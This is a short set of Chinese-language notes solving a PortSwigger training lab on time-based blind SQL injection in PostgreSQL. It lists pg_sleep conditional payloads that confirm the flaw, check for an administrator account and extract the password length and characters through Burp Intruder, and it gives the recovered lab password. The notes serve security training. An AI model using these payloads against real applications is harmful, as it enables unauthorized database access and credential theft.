Subject

Lab: Blind SQL injection with time delays and information retrieval

Url: portswigger.net/web-securit…

Mind Palace

验证时间盲注的可行性：

';select case when (1=1) then pg_sleep(3) else pg_sleep(0) end--
';select case when (1=2) then pg_sleep(3) else pg_sleep(0) end--
# ==> 使用前需要urlencode（; -> %3b）
复制代码

验证user表中有username字段且存在账户administrator：

';select case when (username='administrator') then pg_sleep(10) else pg_sleep(0) end from users--
复制代码

BP的Intruder模块获取password长度：

';select case when (username='administrator' and length(password)>3) then pg_sleep(10) else pg_sleep(0) end from users--s
复制代码

时间盲注：

# 核心payload
';select case when (substring(password,1,1)='a') then pg_sleep(10) else pg_sleep(0) end from users where username='administrator'--
复制代码

接下来使用BP的Intruder模块+cluster bomb方式获取password

==> 按顺序排列出password = hpolhe7xsrnp25ftjvqj